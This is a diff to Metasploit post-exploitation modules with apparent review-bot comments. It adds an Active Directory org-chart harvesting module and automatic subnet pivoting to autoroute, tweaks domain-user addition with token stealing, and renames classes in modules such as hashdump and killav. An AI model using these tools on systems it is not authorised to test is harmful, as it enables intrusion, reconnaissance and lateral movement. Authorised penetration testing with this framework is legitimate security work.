@@ -0,0 +1,106 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'rex' +require 'msf/core' + +class MetasploitModule < Msf::Post + include Msf::Auxiliary::Report + include Msf::Post::Windows::LDAP + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'Generate CSV Organizational Chart Data Using Manager Information', + 'Description' => %( + This module will generate a CSV file containing all users and their managers, which can be + imported into Visio which will render it. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>' + ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ] + )) + + register_options([ + OptBool.new('WITH_MANAGERS_ONLY', [true, 'Only users with managers', false]), + OptBool.new('ACTIVE_USERS_ONLY', [true, 'Only include active users (i.e. not disabled ones)', true]), + OptBool.new('STORE_LOOT', [true, 'Store the organizational chart information in CSV format in loot', true]), + OptString.new('FILTER', [false, 'Additional LDAP filter to use when searching for users', '']) + ], self.class) + end + + def run + max_search = datastore['MAX_SEARCH'] + user_fields = ['cn', 'manager', 'description', 'title', 'telephoneNumber', 'department', 'division', 'userPrincipalName', 'company'] + + begin + qs = [] + qs << '(objectCategory=person)' + qs << '(objectClass=user)' + qs << '(!userAccountControl:1.2.840.113556.1.4.803:=2)' if datastore['ACTIVE_USERS_ONLY'] + qs << '(manager=*)' if datastore['WITH_MANAGERS_ONLY'] + qs << "(#{datastore['FILTER']})" if datastore['FILTER'] != "" + + query_string = "(&(#{qs.join('')}))" + vprint_status("Executing #{query_string}") + q = query(query_string, max_search, user_fields) + rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e + # Can't bind or in a network w/ limited accounts + print_error(e.message) + return + end + 
+ if q.nil? || q[:results].empty? + print_status('No results returned.') + else + user_fields << 'reports_to' + results_table = parse_results(q[:results]) + print_line results_table.to_s + if datastore['STORE_LOOT'] + stored_path = store_loot('ad.orgchart', 'text/csv', session, results_table.to_csv) + print_status("CSV Organisational Chart Information saved to: #{stored_path}") + end + end + end + + # Takes the results of LDAP query, parses them into a table + def parse_results(results) + results_table = Rex::Ui::Text::Table.new( + 'Header' => "Users & Managers", + 'Indent' => 1, + 'SortIndex' => -1, + 'Columns' => ['cn', 'description', 'title', 'phone', 'department', 'division', 'e-mail', 'company', 'reports_to'] + ) + + results.each do |result| + row = [] + + result.each_with_index do |field, idx| + next if idx == 1 # Don't include the manager DN + + if field.nil? + row << "" + else + row << field[:value] + end + end + + # Parse the manager CN string to grab the CN= field only. + # Note that it needs the negative lookbehind to avoid escaped characters. + reports_to = /^CN=(?<cn>.+?),(?<!\\,)/.match(result[1][:value]) + if reports_to.nil? + row << "" + else + row << reports_to['cn'].gsub('\,', ',') + end + + results_table << row + end + results_table + end +end diff --git a/modules/post/windows/gather/memory_grep.rb b/modules/post/windows/gather/memory_grep.rb index 936aae5cf2..6ef9eca087 100644 --- a/modules/post/windows/gather/memory_grep.rb +++ b/modules/post/windows/gather/memory_grep.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info(info, diff --git a/modules/post/windows/gather/netlm_downgrade.rb b/modules/post/windows/gather/netlm_downgrade.rb index b1dca4c2a8..a7f329325d 100644 --- a/modules/post/windows/gather/netlm_downgrade.rb +++ b/modules/post/windows/gather/netlm_downgrade.rb 
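Review bot: In `parse_results` of the new `make_csv_orgchart.rb`, `result[1][:value]` is dereferenced without a nil check, although the loop just above it treats a nil `field` as possible; with `WITH_MANAGERS_ONLY` at its default of `false`, a user without a `manager` attribute would presumably raise `NoMethodError` and abort the whole table. Guard it, for example `manager_dn = result[1] ? result[1][:value].to_s : ''` followed by `reports_to = /\ACN=(?<cn>.+?),(?<!\\,)/.match(manager_dn)`, where `\A` replaces `^` so that only the start of the string can match. Separately, the directory attributes go verbatim into a CSV that the description says is meant for import into Visio; whether `to_csv` neutralises cells beginning with `=`, `+`, `-` or `@` is not visible here and is worth confirming before the file is opened in a spreadsheet tool.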
@@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::WindowsServices diff --git a/modules/post/windows/gather/ntds_location.rb b/modules/post/windows/gather/ntds_location.rb index a875df954e..a6ad03f1d6 100644 --- a/modules/post/windows/gather/ntds_location.rb +++ b/modules/post/windows/gather/ntds_location.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/outlook.rb b/modules/post/windows/gather/outlook.rb index 92269c8d9c..a6f24c8637 100644 --- a/modules/post/windows/gather/outlook.rb +++ b/modules/post/windows/gather/outlook.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Powershell diff --git a/modules/post/windows/gather/phish_windows_credentials.rb b/modules/post/windows/gather/phish_windows_credentials.rb index f01d8c6b95..b8c03bb672 100644 --- a/modules/post/windows/gather/phish_windows_credentials.rb +++ b/modules/post/windows/gather/phish_windows_credentials.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Powershell diff --git a/modules/post/windows/gather/resolve_sid.rb b/modules/post/windows/gather/resolve_sid.rb index d0ead5f552..6cb5ed8b10 100644 --- a/modules/post/windows/gather/resolve_sid.rb +++ b/modules/post/windows/gather/resolve_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Accounts 
diff --git a/modules/post/windows/gather/reverse_lookup.rb b/modules/post/windows/gather/reverse_lookup.rb index 99cee3b42e..4b42bb765c 100644 --- a/modules/post/windows/gather/reverse_lookup.rb +++ b/modules/post/windows/gather/reverse_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index f351301a9e..1dcd1e6638 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rbconfig' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info(info, 'Name' => 'Windows Gather Screen Spy', diff --git a/modules/post/windows/gather/smart_hashdump.rb b/modules/post/windows/gather/smart_hashdump.rb index 4a1f6c4dba..c4dcabaef3 100644 --- a/modules/post/windows/gather/smart_hashdump.rb +++ b/modules/post/windows/gather/smart_hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/tcpnetstat.rb b/modules/post/windows/gather/tcpnetstat.rb index 76566231ff..613d33ee13 100644 --- a/modules/post/windows/gather/tcpnetstat.rb +++ b/modules/post/windows/gather/tcpnetstat.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/usb_history.rb b/modules/post/windows/gather/usb_history.rb index 17af8ff7fc..81ae0ae080 100644 --- a/modules/post/windows/gather/usb_history.rb +++ b/modules/post/windows/gather/usb_history.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/win_privs.rb b/modules/post/windows/gather/win_privs.rb index acb6e8dfa7..eb3b3caa19 100644 --- a/modules/post/windows/gather/win_privs.rb +++ b/modules/post/windows/gather/win_privs.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/wmic_command.rb b/modules/post/windows/gather/wmic_command.rb index 65af916b48..fa285c2a20 100644 --- a/modules/post/windows/gather/wmic_command.rb +++ b/modules/post/windows/gather/wmic_command.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::WMIC diff --git a/modules/post/windows/gather/word_unc_injector.rb b/modules/post/windows/gather/word_unc_injector.rb index 2c727a4677..b0bc6f0bc3 100644 --- a/modules/post/windows/gather/word_unc_injector.rb +++ b/modules/post/windows/gather/word_unc_injector.rb @@ -18,7 +18,7 @@ require 'msf/core' # for creating files require 'rex/zip' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/add_user_domain.rb b/modules/post/windows/manage/add_user_domain.rb index 7eae317a56..9b83b10a67 100644 --- a/modules/post/windows/manage/add_user_domain.rb +++ b/modules/post/windows/manage/add_user_domain.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv 
@@ -223,12 +223,11 @@ class Metasploit3 < Msf::Post end ## steal token if neccessary - if (datastore['TOKEN'] == '') - token_found,token_user,current_user = token_hunter(domain) - - return if token_found == false - - datastore['TOKEN'] = token_user if current_user == false + if datastore['TOKEN'] == '' + token_found, token_user, current_user = token_hunter(domain) + if token_found && current_user == false + datastore['TOKEN'] = token_user + end end ## steal token @@ -247,7 +246,7 @@ class Metasploit3 < Msf::Post already_member_group = false ## Add user to the domain - if (datastore['ADDTODOMAIN'] == true) + if datastore['ADDTODOMAIN'] user_add_res = run_cmd("net user \"#{datastore['USERNAME']}\" /domain",false) if (user_add_res =~ /The command completed successfully/ and user_add_res =~ /Domain Users/) @@ -261,7 +260,7 @@ class Metasploit3 < Msf::Post end ## Add user to a domain group - if datastore['ADDTOGROUP'] == true + if datastore['ADDTOGROUP'] ## check if user is already a member of the group group_add_res = run_cmd("net groups \"#{datastore['GROUP']}\" /domain",false) @@ -291,7 +290,7 @@ class Metasploit3 < Msf::Post end ## verify user was added to domain or domain group - if datastore['ADDTOGROUP'] == true + if datastore['ADDTOGROUP'] if already_member_group == false net_groups_res = run_cmd("net groups \"#{datastore['GROUP']}\" /domain",false) diff --git a/modules/post/windows/manage/autoroute.rb b/modules/post/windows/manage/autoroute.rb index a894ae01d3..8d2670ca37 100644 --- a/modules/post/windows/manage/autoroute.rb +++ b/modules/post/windows/manage/autoroute.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) 
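Review bot: The `@@ -223,12 +223,11 @@` hunk drops the early `return if token_found == false`, so when `token_hunter(domain)` finds nothing the method now continues to the `## steal token` step with `datastore['TOKEN']` still empty. The rest of the method is outside the hunk, so whether that path is handled cannot be confirmed from here. If the fall-through is intended, say so in a comment such as `# no usable token found: continue with the session's current token`; otherwise keep the guard as `return unless token_found`. The remaining `current_user == false` and `already_member_group == false` comparisons could become `!current_user` and `unless already_member_group` to match the `== true` clean-up in the later hunks, provided those values are always booleans.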
@@ -15,7 +15,8 @@ class Metasploit3 < Msf::Post 'Name' => 'Windows Manage Network Route via Meterpreter Session', 'Description' => %q{This module manages session routing via an existing Meterpreter session. It enables other modules to 'pivot' through a - compromised host when connecting to the named NETWORK and SUBMASK.}, + compromised host when connecting to the named NETWORK and SUBMASK. + Autoadd will search session for valid subnets and route to them.}, 'License' => MSF_LICENSE, 'Author' => [ 'todb'], 'Platform' => [ 'win' ], @@ -26,7 +27,7 @@ class Metasploit3 < Msf::Post [ OptString.new('SUBNET', [false, 'Subnet (IPv4, for example, 10.10.10.0)', nil]), OptString.new('NETMASK', [false, 'Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"', '255.255.255.0']), - OptEnum.new('CMD', [true, 'Specify the autoroute command', 'add', ['add','print','delete']]) + OptEnum.new('CMD', [true, 'Specify the autoroute command', 'autoadd', ['add','autoadd','print','delete']]) ], self.class) end @@ -58,6 +59,8 @@ class Metasploit3 < Msf::Post print_status("Adding a route to %s/%s..." % [datastore['SUBNET'],netmask]) add_route(:subnet => datastore['SUBNET'], :netmask => netmask) end + when :autoadd + autoadd_routes when :delete if datastore['SUBNET'] print_status("Deleting route to %s/%s..." % [datastore['SUBNET'],netmask]) 
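Review bot: Changing the `CMD` default from `'add'` to `'autoadd'` in the `@@ -26,7 +27,7 @@` hunk means that running the module with no options set now tries to add a route for every subnet the session reports, whereas the `add` branch shown in the next hunk works from an explicit `datastore['SUBNET']`. Existing resource scripts that relied on the old default would change behaviour silently, and the operator can end up routing to networks outside the agreed scope. Consider keeping `'add'` as the default, or state the new default in the description, e.g. `The default command, autoadd, searches the session for valid subnets and routes to them.`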
@@ -156,6 +159,49 @@ class Metasploit3 < Msf::Post Rex::Socket::SwitchBoard.remove_route(subnet, netmask, session) end + def is_routable?(route) + if route.subnet =~ /^224\.|127\./ + return false + elsif route.subnet =~ /[\d\.]+\.0$/ + return false + elsif route.subnet == '0.0.0.0' + return false + elsif route.subnet == '255.255.255.255' + return false + end + + true + end + + # This function will search for valid subnets on the target and attempt + # add a route to each. (Operation from auto_add_route plugin.) + # + # @return [void] A useful return value is not expected here + def autoadd_routes + switch_board = Rex::Socket::SwitchBoard.instance + print_status("Searching for subnets to autoroute.") + found = false + + session.net.config.each_route do | route | + next unless is_routable?(route) + + if !switch_board.route_exists?(route.subnet, route.netmask) + begin + netmask = route.netmask == '255.255.255.255' ? '255.255.255.0' : route.netmask + if Rex::Socket::SwitchBoard.add_route(route.subnet, netmask, session) + print_good("Route added to subnet #{route.subnet}/#{netmask}") + found = true + else + print_error("Could not add route to subnet #{route.subnet}/#{netmask}") + end + rescue ::Rex::Post::Meterpreter::RequestError => error + print_error("Could not add route to subnet #{route.subnet}/(#{netmask})") + print_error(error.to_s) + end + end + end + print_status("Did not find any new subnets to add.") if !found + end # Validates the command options def validate_cmd(subnet=nil,netmask=nil) diff --git a/modules/post/windows/manage/change_password.rb b/modules/post/windows/manage/change_password.rb index 889f5af7b9..32d3a7bea2 100644 --- a/modules/post/windows/manage/change_password.rb +++ b/modules/post/windows/manage/change_password.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, 
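Review bot: `is_routable?` filters more than it appears to intend. In `/^224\.|127\./` the anchor binds only to the first alternative, so any subnet containing `127.` (for example `10.127.0.0`) is skipped, and `/[\d\.]+\.0$/` rejects every subnet whose last octet is 0, which includes ordinary networks such as the `10.10.10.0` used as the `SUBNET` example in this module's options. Anchor both alternatives with `if route.subnet =~ /\A(?:224|127)\./` and drop or narrow the `.0$` branch. In `autoadd_routes`, `route_exists?` is checked with `route.netmask` while the route is added with the widened `netmask`, and the message in the `rescue` prints `/(#{netmask})` with stray parentheses.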
diff --git a/modules/post/windows/manage/clone_proxy_settings.rb b/modules/post/windows/manage/clone_proxy_settings.rb index c270e7bd94..400396dd72 100644 --- a/modules/post/windows/manage/clone_proxy_settings.rb +++ b/modules/post/windows/manage/clone_proxy_settings.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/manage/delete_user.rb b/modules/post/windows/manage/delete_user.rb index 5cc08d1e83..e0728d84d7 100644 --- a/modules/post/windows/manage/delete_user.rb +++ b/modules/post/windows/manage/delete_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/manage/download_exec.rb b/modules/post/windows/manage/download_exec.rb index b920f64184..5a0dc0d74e 100644 --- a/modules/post/windows/manage/download_exec.rb +++ b/modules/post/windows/manage/download_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/manage/driver_loader.rb b/modules/post/windows/manage/driver_loader.rb index 9558084429..4e4683ffe3 100644 --- a/modules/post/windows/manage/driver_loader.rb +++ b/modules/post/windows/manage/driver_loader.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/enable_rdp.rb b/modules/post/windows/manage/enable_rdp.rb index e798ac70a0..55a67d5b42 100644 --- a/modules/post/windows/manage/enable_rdp.rb +++ b/modules/post/windows/manage/enable_rdp.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Accounts include Msf::Post::Windows::Registry diff --git a/modules/post/windows/manage/enable_support_account.rb b/modules/post/windows/manage/enable_support_account.rb index c5a949c3f6..6f90cc8129 100644 --- a/modules/post/windows/manage/enable_support_account.rb +++ b/modules/post/windows/manage/enable_support_account.rb @@ -1,7 +1,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/exec_powershell.rb b/modules/post/windows/manage/exec_powershell.rb index 11b6659f6b..7894086acc 100644 --- a/modules/post/windows/manage/exec_powershell.rb +++ b/modules/post/windows/manage/exec_powershell.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/powershell' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Powershell def initialize(info={}) diff --git a/modules/post/windows/manage/forward_pageant.rb b/modules/post/windows/manage/forward_pageant.rb index d8dbf4ee18..e5cba36cef 100644 --- a/modules/post/windows/manage/forward_pageant.rb +++ b/modules/post/windows/manage/forward_pageant.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'tmpdir' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv def initialize(info = {}) diff --git a/modules/post/windows/manage/ie_proxypac.rb b/modules/post/windows/manage/ie_proxypac.rb index 82ff84eb6b..26aaaef4f7 100644 --- a/modules/post/windows/manage/ie_proxypac.rb +++ b/modules/post/windows/manage/ie_proxypac.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::File 
diff --git a/modules/post/windows/manage/inject_ca.rb b/modules/post/windows/manage/inject_ca.rb index f86f5cdf0d..26261c7c52 100644 --- a/modules/post/windows/manage/inject_ca.rb +++ b/modules/post/windows/manage/inject_ca.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/inject_host.rb b/modules/post/windows/manage/inject_host.rb index 0151db3970..d5333cf80f 100644 --- a/modules/post/windows/manage/inject_host.rb +++ b/modules/post/windows/manage/inject_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/killav.rb b/modules/post/windows/manage/killav.rb index fb86ce4401..826bbc8f07 100644 --- a/modules/post/windows/manage/killav.rb +++ b/modules/post/windows/manage/killav.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'set' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/migrate.rb b/modules/post/windows/manage/migrate.rb index 5dd4e6259d..671ee5670f 100644 --- a/modules/post/windows/manage/migrate.rb +++ b/modules/post/windows/manage/migrate.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/mssql_local_auth_bypass.rb b/modules/post/windows/manage/mssql_local_auth_bypass.rb index 5d14a36694..695eba3ede 100644 --- a/modules/post/windows/manage/mssql_local_auth_bypass.rb +++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/mssql' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::MSSQL 
@@ -38,7 +38,7 @@ class Metasploit3 < Msf::Post OptString.new('DB_USERNAME', [true, 'New sysadmin login', '']), OptString.new('DB_PASSWORD', [true, 'Password for new sysadmin login', '']), OptString.new('INSTANCE', [false, 'Name of target SQL Server instance', nil]), - OptBool.new('REMOVE_LOGIN', [true, 'Remove DB_USERNAME login from database', 'false']) + OptBool.new('REMOVE_LOGIN', [true, 'Remove DB_USERNAME login from database', false]) ], self.class) end diff --git a/modules/post/windows/manage/multi_meterpreter_inject.rb b/modules/post/windows/manage/multi_meterpreter_inject.rb index 4900e1fc64..83ba7c78c0 100644 --- a/modules/post/windows/manage/multi_meterpreter_inject.rb +++ b/modules/post/windows/manage/multi_meterpreter_inject.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) diff --git a/modules/post/windows/manage/nbd_server.rb b/modules/post/windows/manage/nbd_server.rb index 41f786ac8c..2395a2faa7 100644 --- a/modules/post/windows/manage/nbd_server.rb +++ b/modules/post/windows/manage/nbd_server.rb @@ -13,7 +13,7 @@ # Mississippi State University National Forensics Training Center # http://msu-nftc.org -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/payload_inject.rb b/modules/post/windows/manage/payload_inject.rb index 10c6317646..adfb373da6 100644 --- a/modules/post/windows/manage/payload_inject.rb +++ b/modules/post/windows/manage/payload_inject.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/common' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Common diff --git a/modules/post/windows/manage/portproxy.rb b/modules/post/windows/manage/portproxy.rb index 2fc0584665..73d139ba05 100644 --- a/modules/post/windows/manage/portproxy.rb +++ b/modules/post/windows/manage/portproxy.rb 
@@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/manage/powershell/exec_powershell.rb b/modules/post/windows/manage/powershell/exec_powershell.rb index 8707cb705e..ae8b15ef74 100644 --- a/modules/post/windows/manage/powershell/exec_powershell.rb +++ b/modules/post/windows/manage/powershell/exec_powershell.rb @@ -17,7 +17,7 @@ require 'zlib' # TODO: check if this can be done with REX require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Powershell def initialize(info={}) diff --git a/modules/post/windows/manage/powershell/load_script.rb b/modules/post/windows/manage/powershell/load_script.rb index e3d270f9e9..edad0d8571 100644 --- a/modules/post/windows/manage/powershell/load_script.rb +++ b/modules/post/windows/manage/powershell/load_script.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Powershell def initialize(info={}) diff --git a/modules/post/windows/manage/pptp_tunnel.rb b/modules/post/windows/manage/pptp_tunnel.rb index 4f71034b08..2dfc967798 100644 --- a/modules/post/windows/manage/pptp_tunnel.rb +++ b/modules/post/windows/manage/pptp_tunnel.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/priv_migrate.rb b/modules/post/windows/manage/priv_migrate.rb index 04cba5d6c3..8030f78575 100644 --- a/modules/post/windows/manage/priv_migrate.rb +++ b/modules/post/windows/manage/priv_migrate.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Post It will do everything it can to migrate, including spawing a new User level process. For sessions with Admin rights: It will try to migrate into a System level process in the following order: ANAME (if specified), services.exe, winlogon.exe, wininit.exe, lsm.exe, and lsass.exe. - If al these fail, it will fall back to User level migration. For sessions with User level rights: + If all these fail, it will fall back to User level migration. For sessions with User level rights: It will try to migrate to a user level process, if that fails it will attempt to spawn the process then migrate to it. It will attempt the User level processes in the following order: NAME (if specified), explorer.exe, then notepad.exe.}, @@ -53,6 +53,7 @@ class Metasploit3 < Msf::Post end # This function returns the first process id of a process with the name provided. + # It will make sure that the process has a visible user meaning that the session has rights to that process. # Note: "target_pid = session.sys.process[proc_name]" will not work when "include Msf::Post::Windows::Priv" is in the module. # # @return [Fixnum] the PID if one is found @@ -60,7 +61,9 @@ class Metasploit3 < Msf::Post def get_pid(proc_name) processes = client.sys.process.get_processes processes.each do |proc| - return proc['pid'] if proc['name'] == proc_name + if proc['name'] == proc_name && proc['user'] != "" + return proc['pid'] + end end return nil end diff --git a/modules/post/windows/manage/pxeexploit.rb b/modules/post/windows/manage/pxeexploit.rb index 8692ed4a64..2ef7e54b0f 100644 --- a/modules/post/windows/manage/pxeexploit.rb +++ b/modules/post/windows/manage/pxeexploit.rb 
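Review bot: In `get_pid`, `proc['user'] != ""` is also true when the value is `nil`, so a process whose owner is not reported at all would still be returned, contrary to the comment this commit adds above the method. Whether `get_processes` can yield `nil` for that key is not visible in this hunk. `if proc['name'] == proc_name && !proc['user'].to_s.empty?` covers both cases. The block variable `proc` also shadows `Kernel#proc` and could be renamed `process`.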
@@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb index f52eac1e24..93f47f6f5e 100644 --- a/modules/post/windows/manage/reflective_dll_inject.rb +++ b/modules/post/windows/manage/reflective_dll_inject.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::ReflectiveDLLInjection diff --git a/modules/post/windows/manage/remove_ca.rb b/modules/post/windows/manage/remove_ca.rb index 2a2437d0d2..4df9dd274e 100644 --- a/modules/post/windows/manage/remove_ca.rb +++ b/modules/post/windows/manage/remove_ca.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/remove_host.rb b/modules/post/windows/manage/remove_host.rb index 9f78208ea3..733af81ad7 100644 --- a/modules/post/windows/manage/remove_host.rb +++ b/modules/post/windows/manage/remove_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/rpcapd_start.rb b/modules/post/windows/manage/rpcapd_start.rb index b49600378b..55b430af9a 100644 --- a/modules/post/windows/manage/rpcapd_start.rb +++ b/modules/post/windows/manage/rpcapd_start.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry 
@@ -52,8 +52,8 @@ class Metasploit3 < Msf::Post print_status("Setting rpcapd as 'auto' service") service_change_startup("rpcapd", START_TYPE_AUTO) end - if datastore['ACTIVE']==true - if datastore['RHOST']==nil + if datastore['ACTIVE'] + if datastore['RHOST'].nil? print_error("RHOST is not set ") return else @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Post print_status("Installing rpcap in PASSIVE mode (local port: #{datastore['PORT']}) ") p = prog << " -d -p #{datastore['PORT']} " end - if datastore['NULLAUTH']==true + if datastore['NULLAUTH'] p<< "-n" end run_rpcapd(p) diff --git a/modules/post/windows/manage/run_as.rb b/modules/post/windows/manage/run_as.rb index 36137acf65..c471b7042b 100644 --- a/modules/post/windows/manage/run_as.rb +++ b/modules/post/windows/manage/run_as.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Runas diff --git a/modules/post/windows/manage/sdel.rb b/modules/post/windows/manage/sdel.rb index a2691cc1d4..4ee17a767b 100644 --- a/modules/post/windows/manage/sdel.rb +++ b/modules/post/windows/manage/sdel.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::File @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Post n = datastore['ITERATIONS'] file = datastore['FILE'] - if datastore['ZERO']==true + if datastore['ZERO'] type = 0 print_status("The file will be overwritten with null bytes") end diff --git a/modules/post/windows/manage/smart_migrate.rb 